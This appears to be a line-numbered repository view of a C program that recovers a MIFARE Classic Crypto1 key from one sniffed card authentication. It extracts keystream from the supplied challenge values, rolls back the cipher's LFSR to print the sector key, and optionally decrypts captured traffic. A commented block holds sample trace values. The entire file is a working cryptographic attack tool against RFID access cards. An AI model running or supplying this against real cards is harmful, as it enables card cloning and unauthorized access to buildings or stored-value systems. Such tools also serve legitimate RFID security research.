]>
Commit | Line | Data |
---|---|---|
1 | #include <inttypes.h> | |
2 | #include "crapto1.h" | |
3 | #include <stdio.h> | |
4 | #include <string.h> | |
5 | ||
6 | int main (int argc, char *argv[]) { | |
7 | struct Crypto1State *revstate; | |
8 | uint64_t key; // recovered key | |
9 | uint32_t uid; // serial number | |
10 | uint32_t nt; // tag challenge | |
11 | uint32_t nr_enc; // encrypted reader challenge | |
12 | uint32_t ar_enc; // encrypted reader response | |
13 | uint32_t at_enc; // encrypted tag response | |
14 | uint32_t ks2; // keystream used to encrypt reader response | |
15 | uint32_t ks3; // keystream used to encrypt tag response | |
16 | ||
17 | printf("MIFARE Classic key recovery - based 64 bits of keystream\n"); | |
18 | printf("Recover key from only one complete authentication!\n\n"); | |
19 | ||
20 | if (argc < 6 ) { | |
21 | printf(" syntax: %s <uid> <nt> <{nr}> <{ar}> <{at}> [enc] [enc...]\n\n", argv[0]); | |
22 | return 1; | |
23 | } | |
24 | ||
25 | int encc = argc - 6; | |
26 | int enclen[encc]; | |
27 | uint8_t enc[encc][120]; | |
28 | ||
29 | sscanf(argv[1], "%x", &uid); | |
30 | sscanf(argv[2], "%x", &nt); | |
31 | sscanf(argv[3], "%x", &nr_enc); | |
32 | sscanf(argv[4], "%x", &ar_enc); | |
33 | sscanf(argv[5], "%x", &at_enc); | |
34 | for (int i = 0; i < encc; i++) { | |
35 | enclen[i] = strlen(argv[i + 6]) / 2; | |
36 | for (int i2 = 0; i2 < enclen[i]; i2++) { | |
37 | sscanf(argv[i+6] + i2*2,"%2x", (uint8_t*)&enc[i][i2]); | |
38 | } | |
39 | } | |
40 | printf("Recovering key for:\n"); | |
41 | ||
42 | printf(" uid: %08x\n", uid); | |
43 | printf(" nt: %08x\n", nt); | |
44 | printf(" {nr}: %08x\n", nr_enc); | |
45 | printf(" {ar}: %08x\n", ar_enc); | |
46 | printf(" {at}: %08x\n", at_enc); | |
47 | for (int i = 0; i < encc; i++) { | |
48 | printf("{enc%d}: ", i); | |
49 | for (int i2 = 0; i2 < enclen[i]; i2++) { | |
50 | printf("%02x", enc[i][i2]); | |
51 | } | |
52 | printf("\n"); | |
53 | } | |
54 | ||
55 | ||
56 | /* | |
57 | uint32_t uid = 0x9c599b32; | |
58 | uint32_t tag_challenge = 0x82a4166c; | |
59 | uint32_t nr_enc = 0xa1e458ce; | |
60 | uint32_t reader_response = 0x6eea41e0; | |
61 | uint32_t tag_response = 0x5cadf439; | |
62 | */ | |
63 | // Generate lfsr succesors of the tag challenge | |
64 | printf("\nLFSR succesors of the tag challenge:\n"); | |
65 | printf(" nt': %08x\n",prng_successor(nt, 64)); | |
66 | printf(" nt'': %08x\n",prng_successor(nt, 96)); | |
67 | ||
68 | // Extract the keystream from the messages | |
69 | printf("\nKeystream used to generate {ar} and {at}:\n"); | |
70 | ks2 = ar_enc ^ prng_successor(nt, 64); | |
71 | ks3 = at_enc ^ prng_successor(nt, 96); | |
72 | printf(" ks2: %08x\n",ks2); | |
73 | printf(" ks3: %08x\n",ks3); | |
74 | ||
75 | revstate = lfsr_recovery64(ks2, ks3); | |
76 | ||
77 | // Decrypting communication using keystream if presented | |
78 | if (argc > 6 ) { | |
79 | printf("\nDecrypted communication:\n"); | |
80 | uint8_t ks4; | |
81 | int rollb = 0; | |
82 | for (int i = 0; i < encc; i++) { | |
83 | printf("{dec%d}: ", i); | |
84 | for (int i2 = 0; i2 < enclen[i]; i2++) { | |
85 | ks4 = crypto1_byte(revstate, 0, 0); | |
86 | printf("%02x", ks4 ^ enc[i][i2]); | |
87 | rollb += 1; | |
88 | } | |
89 | printf("\n"); | |
90 | } | |
91 | for (int i = 0; i < rollb; i++) { | |
92 | lfsr_rollback_byte(revstate, 0, 0); | |
93 | } | |
94 | } | |
95 | ||
96 | lfsr_rollback_word(revstate, 0, 0); | |
97 | lfsr_rollback_word(revstate, 0, 0); | |
98 | lfsr_rollback_word(revstate, nr_enc, 1); | |
99 | lfsr_rollback_word(revstate, uid ^ nt, 0); | |
100 | crypto1_get_lfsr(revstate, &key); | |
101 | printf("\nFound Key: [%012" PRIx64"]\n\n",key); | |
102 | crypto1_destroy(revstate); | |
103 | ||
104 | return 0; | |
105 | } |